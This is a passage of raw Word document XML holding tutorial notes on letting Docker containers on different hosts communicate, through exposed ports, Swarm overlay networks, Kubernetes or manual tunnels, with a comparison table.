          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E3B87"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xml:space="preserve">Expose container B’s service (e.g., REST API) on a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public port</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE9DA9"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From container A, make a request to http://&lt;Host-B-IP&gt;:&lt;exposed-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22231A5D"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B71D94"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On Host B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F68EA9"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docker run -p 8080:8080 my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB9F58" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DACC46B"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On Host A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8015B"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curl http://&lt;Host-B-IP&gt;:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058DAA6" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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8FE77FE">
          <v:rect id="_x0000_i3369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8DCEF" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Overlay Network (Swarm Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D0935E"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xml:space="preserve">If you use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can create an </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overlay network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing containers on different hosts to communicate </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>as if they’re on the same network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B24F20"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Initialize Swarm on one host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A922729"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docker swarm init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F53401" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D8B140"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Join the second host to the swarm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414C881"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docker swarm join --token &lt;token&gt; &lt;manager-ip&gt;:2377</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5CD833" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DF067A"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Create overlay network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47084A2A"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lastRenderedPageBreak/>
        <w:t>docker network create -d overlay my-overlay-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241210EA" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641FAACF"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Deploy services to use this network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8C42E"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docker service create --name service1 --network my-overlay-network my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAF1A6" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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54E3C0B">
          <v:rect id="_x0000_i3370" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD55E71" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37951FE5"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xml:space="preserve">If you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flat network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>every pod can reach every other pod</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF55DFE" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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56233A3">
          <v:rect id="_x0000_i3371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623D641" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Manual Tunneling (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF548E"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xml:space="preserve">You can set up </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VPNs, SSH tunnels</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VxLANs</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to connect hosts at the network level — more complex and rarely used if you can use Swarm or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB965E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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363AC2F">
          <v:rect id="_x0000_i3372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70845243" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> What Won’t Work Directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54C46F"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xml:space="preserve">Default bridge network is </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>local to the host</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200A5FA"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 xml:space="preserve">Container names (DNS resolution) work </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only within a Docker network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not across machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC1E85" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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1D17B36">
          <v:rect id="_x0000_i3373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B9EB9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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31"/>
        <w:gridCol w:w="2878"/>
        <w:gridCol w:w="2639"/>
      </w:tblGrid>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="17D24758" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E4E0D9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Communication Across Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E929CCE" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7996589C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Container-to-Container DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="3518716E" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7907B962"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Public IP + Exposed Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385FCA35"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Simple, but not secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DDD126B"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="70574987" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C46BA5"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Docker Swarm + Overlay Net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B6254E2"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Recommended in Docker world</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665F47ED"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="3089AA0B" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FACB89A"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Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0032CFD4"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Best for microservices at scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385BB05D"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="45016481" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C4D2A16"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Manual Networking (VPNs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2754496A"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Advanced use cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67911C8E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Possible with setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D12AC33" w14:textId="2913D51F" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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2A32D75">
          <v:rect id="_x0000_i3374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB8116" w14:textId="4229D785" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00145C74">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
